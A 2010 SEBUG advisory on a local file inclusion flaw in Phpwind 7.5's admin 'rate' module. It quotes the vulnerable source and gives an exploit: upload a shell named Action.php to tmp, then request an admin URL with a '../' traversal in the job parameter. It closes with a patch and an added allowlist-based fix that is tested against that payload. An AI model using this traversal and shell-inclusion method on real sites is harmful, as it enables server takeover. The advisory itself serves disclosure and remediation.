Phpwind7.5 Admin Back-End Local File Inclusion Vulnerability
Friday, February 5, 2010 | SSV ID:19065
SEBUG-Appdir:PHPWind
Published:2010-02-05
Vulnerable:
Phpwind7.5
Description:
File: hack\rate\admin.php
Source:

<?php
!function_exists('readover') && exit('Forbidden');
define ( "H_R", R_P . "hack/rate/" );
define ( "L_R", R_P . "lib/" );
InitGP ( array ('ajax' ) );
// $job comes from the request and is used unvalidated to build the path
$action = strtolower ( ($job) ? $job : "admin" );
$filepath = H_R . "action/" . $action . "Action.php";
(! file_exists ( $filepath )) && exit ();
if ($job != "ajax") {
    require H_R . '/template/layout.php';
} else {
    require_once $filepath;
}
?>

Now look at hack\rate\template\layout.php:

<?php
!function_exists('readover') && exit('Forbidden');
include_once PrintEot ( 'left' );
print <<<EOT
-->
EOT;
// $filepath was built in admin.php from the request-supplied $job
require_once $filepath;
include_once PrintEot ( 'adminbottom' );
?>

$job can be set freely by the requester, which triggers a local file inclusion. The value has been passed through addslashes, so it cannot be truncated with %00; it can, however, be truncated with a run of slashes (///////), or a shell can simply be written to the tmp folder and included.
Exploit:
The following procedures (methods) may contain something offensive; they are for security research and teaching only. Use at your own risk!
First upload a shell named Action.php to tmp, then visit:
http://127.0.0.1/pw/admin.php?adminjob=hack&hackset=rate&typeid=100&job=../../../../../../tmp/
SEBUG Solution:
Temporary patch: replace

$filepath = H_R . "action/" . $action . "Action.php";

with:

$filepath = Pcv(H_R . "action/" . $action . "Action.php");
// sebug.net [2010-02-05]
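
An added example, not part of the original advisory and not Phpwind's own code: a stricter way to resolve the action file that accepts only a plain identifier for job and confirms the canonical path stays inside the action directory. The helper name resolve_action_file and the temporary directory standing in for hack/rate/action/ are hypothetical and constructed for the demonstration.

```php
<?php
// Added example: allowlist-style resolution of the action file.
// resolve_action_file() is a hypothetical helper, not Phpwind code.

function resolve_action_file(string $actionDir, ?string $job): ?string
{
    $action = strtolower($job ?: 'admin');

    // 1. Accept only a plain identifier: no dots, slashes or backslashes,
    //    so "../" sequences and slash padding never reach the path.
    if (!preg_match('/^[a-z0-9_]{1,32}$/', $action)) {
        return null;
    }

    // 2. Canonicalise and confirm the file really lives inside $actionDir
    //    (this also catches symlinks that point elsewhere).
    $base = realpath($actionDir);
    $path = realpath($actionDir . DIRECTORY_SEPARATOR . $action . 'Action.php');
    if ($base === false || $path === false) {
        return null; // directory or action file does not exist
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo: a temporary directory standing in for hack/rate/action/.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'rate_action_' . getmypid();
@mkdir($dir);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'adminAction.php', "<?php\n");

// Constructed sample inputs: the default, valid names, the traversal value
// from the advisory, slash padding, and a name with no matching file.
$samples = [null, 'admin', 'ADMIN', '../../../../../../tmp/',
            'admin' . str_repeat('/', 40), 'missing'];
foreach ($samples as $job) {
    $resolved = resolve_action_file($dir, $job);
    printf("%s => %s\n", var_export($job, true),
           $resolved === null ? 'rejected' : 'accepted');
}

unlink($dir . DIRECTORY_SEPARATOR . 'adminAction.php');
rmdir($dir);
```

Only the first three samples resolve to adminAction.php; the traversal value, the slash-padded value and the unknown name are rejected before any require is reached.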